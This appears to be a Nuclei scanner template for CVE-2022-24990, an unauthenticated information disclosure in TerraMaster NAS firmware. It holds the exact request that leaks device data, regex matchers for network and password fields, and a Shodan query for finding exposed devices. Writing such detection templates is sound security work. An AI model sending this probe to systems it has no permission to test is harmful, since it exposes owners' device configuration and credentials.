54 lines
1.6 KiB
YAML
54 lines
1.6 KiB
YAML
id: CVE-2022-24990
|
|
|
|
info:
|
|
name: TerraMaster TOS < 4.2.30 Server Information Disclosure
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
|
|
reference:
|
|
- https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
|
|
- https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732
|
|
- https://forum.terra-master.com/en/viewforum.php?f=28
|
|
- http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-24990
|
|
epss-score: 0.96236
|
|
cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: "TerraMaster"
|
|
vendor: terra-master
|
|
product: terramaster_operating_system
|
|
tags: packetstorm,cve,cve2022,terramaster,exposure,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/module/api.php?mobile/webNasIPS"
|
|
|
|
headers:
|
|
User-Agent: "TNAS"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
- "TerraMaster"
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "webNasIPS successful"
|
|
- "(ADDR|(IFC|PWD|[DS]AT)):"
|
|
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|